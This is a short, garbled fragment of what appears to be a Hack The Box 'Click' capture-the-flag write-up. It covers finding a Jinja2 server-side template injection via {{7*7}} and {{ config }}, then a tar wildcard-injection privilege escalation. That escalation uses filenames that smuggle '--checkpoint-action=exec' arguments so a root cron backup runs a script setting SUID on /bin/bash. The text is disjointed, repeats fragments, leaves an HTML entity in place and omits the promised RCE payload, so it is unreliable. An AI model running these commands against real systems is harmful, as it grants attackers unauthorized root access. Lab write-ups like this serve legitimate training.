Click Htb Writeup ((link)) -

In /home/click :

/login /dashboard /forgot-password /test The /test endpoint is promising. Discovering SSTI The /test endpoint accepts a parameter ?name= . Submitting {{7*7}} returns 49 in the response → Server-Side Template Injection (Jinja2). Confirming Execution Payload: {{ config }} → Leaks Flask configuration, confirming Jinja2. Gaining RCE Jinja2 SSTI to RCE: click htb writeup

echo "#!/bin/bash" > shell.sh echo "chmod u+s /bin/bash" >> shell.sh touch -- "--checkpoint=1" touch -- "--checkpoint-action=exec=sh shell.sh" When the backup runs (likely via cron as root), tar executes shell.sh , giving /bin/bash SUID. shell.sh echo "chmod u+s /bin/bash" &gt

Wait for cron (or run backup manually if possible), then: tar executes shell.sh